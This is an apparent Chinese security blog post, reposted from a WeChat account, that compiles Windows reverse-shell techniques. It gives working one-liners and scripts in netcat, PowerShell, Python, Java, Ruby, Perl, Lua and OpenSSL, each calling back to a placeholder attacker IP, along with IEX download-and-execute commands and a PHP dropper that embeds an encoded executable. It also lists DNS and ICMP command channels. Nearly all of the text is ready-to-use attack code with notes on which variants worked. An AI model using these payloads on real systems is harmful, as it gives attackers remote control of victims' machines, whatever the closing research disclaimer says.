你的心不会动摇我的爱。
我是垃圾
但我的爱不是!
reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。
reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
本文主要是介绍我整理在windows下使用各种语言反弹shell大纲。
篇幅过长,所以只讲实际项目,原理的话已经有很多前辈们写过了。
netcat 下载:
https://eternallybored.org/misc/netcat/#建议考虑使用Ncat
攻击机监听:
nc -lp 4444nc 1.1.1.1 4444 -e c:windowssystem32cmd.exencat 1.1.1.1 4444 -e c:windowssystem32cmd.exe
攻击者主机上执行监听:
nc -lvvp 4444在目标主机上执行:
#OK 成功反弹shellpowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()#OK 成功反弹shellpowershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('1.1.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"#ERROR 发起连接后没有响应powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("1.1.1.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
mini-reverse.ps1#文件不能直接使用,需要先修改反弹IP#修改IP后远程下载反弹shellpowershell -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SkullSec/mini-reverse/master/mini-reverse.ps1')#本地下载修改IP后执行反弹powershell -NoP -NonI -W Hidden -Exec Bypass .mini-reverse.ps1powershell-reverse-tcp#PS正向bind与反向shell集合https://github.com/ivan-sincek/powershell-reverse-tcpCodeExecution-Meterpreter.ps1#通过powershell反弹meterpreterhttps://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1
PS C:WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 1.1.1.1 -p 4444 -e cmd下载到目标机器本地执行:
PS C:WWW> Import-Module ./powercat.ps1PS C:WWW> powercat -c 1.1.1.1 -p 4444 -e cmd
上传powercat-shell
#1、生成shell反弹脚本PS C:> Set-ExecutionPolicy UnrestrictedPS C:> cd .powercatPS C:powercat> Import-Module .powercat.ps1PS C:powercat> powercat -c 1.1.1.1 -p 4444 -e cmd -g >> payload.ps1#2、#VPS监听反向shellnc -lvp 8080#3、把payload.ps1丢到目标机器上去执行powershell –exec bypass –Command "& {Import-Module 'C:payload.ps1'}"
python2 windows反向shell
#攻击者主机上执行监听:nc -lvvp 4444#在目标主机上执行:python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1.1.1.1', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\windows\system32\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
python UDP反弹shell
https://github.com/ecthros/udpshell#攻击者主机上执行监听:nc -l -p 53 -u#注意这里务必要用udp的模式来接在目标主机上执行:python2 udpshell.py 1.1.1.1 53 udp#linux OK;windows OK;
其他python 反弹shell项目:
Windows正向绑定shell和反向反弹shell的Python代码https://www.cnblogs.com/KevinGeorge/p/9780151.html
攻击者主机上执行监听:
nc -lvvp 4444目标靶机编译并运行java脚本:
#shell.javaimport java.net.*;import java.io.*;import java.io.OutputStream;import java.io.InputStream;public class shell{public static void main (String args[]) throws Exception{int c;Socket s=new Socket("1.1.1.1",4444);Process p=new ProcessBuilder("C:\Windows\System32\cmd.exe").redirectErrorStream(true).start();InputStream pin=p.getInputStream(),sin=s.getInputStream();OutputStream pout=p.getOutputStream(),sout =s.getOutputStream();while(!s.isClosed()){while( pin.available() > 0 ){sout.write(pin.read());} while( sin.available() > 0){pout.write(sin.read());} pout.flush();sout.flush();try{p.exitValue();break;} catch (Exception e){}} p.destroy();s.close();}}#使用:javac shell.java && java shell#注意:编译前需要修改文件名=内部类名
//Author #Captain_Nemoimport java.net.*;import java.io.*;import java.io.OutputStream;import java.io.InputStream;public class shell {public static void main (String args[]) throws Exception {int c;Socket s = new Socket("1.1.1.1" ,4444);//Runtime r = Runtime.getRuntime();// Process p = r.exec(new String[] {"C:\Windows\System32\cmd.exe", "/K", "Start"});Process p = new ProcessBuilder("C:\Windows\System32\cmd.exe").redirectErrorStream(true).start();InputStream pin = p.getInputStream(),sin=s.getInputStream();OutputStream pout = p.getOutputStream(),sout =s.getOutputStream();while(!s.isClosed()){while( pin.available() > 0 ){//int buff = in.read();sout.write(pin.read());}while( sin.available() > 0){//int buff1 = in1.read();pout.write(sin.read());}pout.flush();sout.flush();try{p.exitValue();break;} catch (Exception e){}} // end whilep.destroy();s.close();} //end main} //end class def
攻击者主机上执行监听:nc -lvvp 4444在目标主机上执行:ruby -r socket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end"#ERROR 连接后断开; Error;ruby -rsocket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end"#ERROR 连接后断开; Error;ruby -r socket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd){|io|c.print io.read}end"#OK
#!/usr/bin/env rubyrequire 'socket'require 'open3'#Set the Remote Host IPRHOST = "1.1.1.1"#Set the Remote Host PortPORT = "4444"#Tries to connect every 20 sec until it connects.beginsock = TCPSocket.new "#{RHOST}", "#{PORT}"sock.puts "We are connected!"rescuesleep 20retryend#Runs the commands you type and sends you back the stdout and stderr.beginwhile line = sock.getsOpen3.popen2e("#{line}") do | stdin, stdout_and_stderr |IO.copy_stream(stdout_and_stderr, sock)endendrescueretryend
Ruby正反向shell相关项目https://github.com/Hood3dRob1n/Ruby-Bind-and-Reverse-Shells
PHP环境下访问即可反弹到指定IP端口一个普通交互shell,需要php需未禁用exec函数
#php-reverse-shell-win<?phpheader('Content-type: text/plain');$ip = "1.1.1.1"; //change this$port = "4444"; //change this$payload = "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";$evalCode = gzinflate(base64_decode($payload));$evalArguments = " ".$port." ".$ip;$tmpdir ="C:\windows\temp";chdir($tmpdir);$res .= "Using dir : ".$tmpdir;$filename = "D3fa1t_shell.exe";$file = fopen($filename, 'wb');fwrite($file, $evalCode);fclose($file);$path = $filename;$cmd = $path.$evalArguments;$res .= "nnExecuting : ".$cmd."n";echo $res;$output = system($cmd);?>
通用的php反向shell项目:
php-reverse-shell#适用Linux和macOS和 Windowshttps://github.com/ivan-sincek/php-reverse-shell #linux测试通过,支持作为web脚本#php_reverse_shell.php PHP v5.0.0 或更高版本#php_reverse_shell_older.php 需要PHP v4.3.0或更高版本。
参考文章:使用 OpenSSL 反弹加密shellhttps://www.cnblogs.com/heycomputer/articles/10697865.html
在 Windows 系统上反弹加密shell 的方式有点不一样
具体命令如下:
openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]以上命令会从 [ip]:[port1] 获取命令发送给 cmd.exe执行,然后把结果返回到 [ip]:[port2]
因此在本机需要启动两个 s_server
#从 port1 发送命令到 cmdopenssl s_server -quiet -key [keyfile] -cert [cert] -port [port1]
#从 port2 获取发送给 port1的命令执行结果openssl s_server -quiet -key [keyfile] -cert [cert] -port [port2]
攻击者主机上执行监听:
nc -lvvp 4444在目标主机上执行:
perl -MIO -e "$c=new IO::Socket::INET(PeerAddr,'1.1.1.1:4444);STDIN->fdopen($c,r);$~->fdopen($c,w) ;system$_ while<>;"#测试OK
#攻击者主机上执行监听:nc -lvvp 4444#在目标主机上执行:lua5.1 -e 'local host, port = "1.1.1.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'#linux lua5.1 OK;
dnscat2 通过DNS协议创建加密的命令和控制通道
#github项目地址:https://github.com/iagox86/dnscat2
#服务端:ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open
#目标主机:powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx
icmpsh是一个简单的ICMP反弹shell,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。
icmpsh工具使用简单,是一个跨平台工具,运行不需要管理员权限。
https://github.com/inquisb/icmpshpowershell Invoke-Vnchttps://github.com/klsecservices/Invoke-Vnc#powershell在内存中执行VNC反向连接或绑定到指定端口。
tightvnc 免安装版#免安装的VNC服务端和客户端#不知道从哪里获取的版本,公众号回复【共享】获取文件
参考文章#命令行下实现VNC反向连接https://blog.csdn.net/kf/article/details/8567726#UltraVNC反向连接方式的使用https://blog.csdn.net/skydust1979/article/details/105935444/
HARS 一款基于C#的加密反向shellhttps://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell
LOLBITS 一款基于C#的加密反向shellhttps://github.com/Kudaes/LOLBITS.git
0x15 golang-windows
Hershell 一款功能强大的跨平台反向Shell生成器https://github.com/lesnuages/hershellReverseGoShell 具有AES动态加密功能的Golang反向Shell工具https://github.com/TheKingOfDuck/ReverseGoShell
0x16 其他上线方式
cpl反弹meterpreterhttps://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp#使用方法:生成dll,重命名为cpl,双击执行
END
本文始发于微信公众号(NOVASEC):反弹shell之Windows反向shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论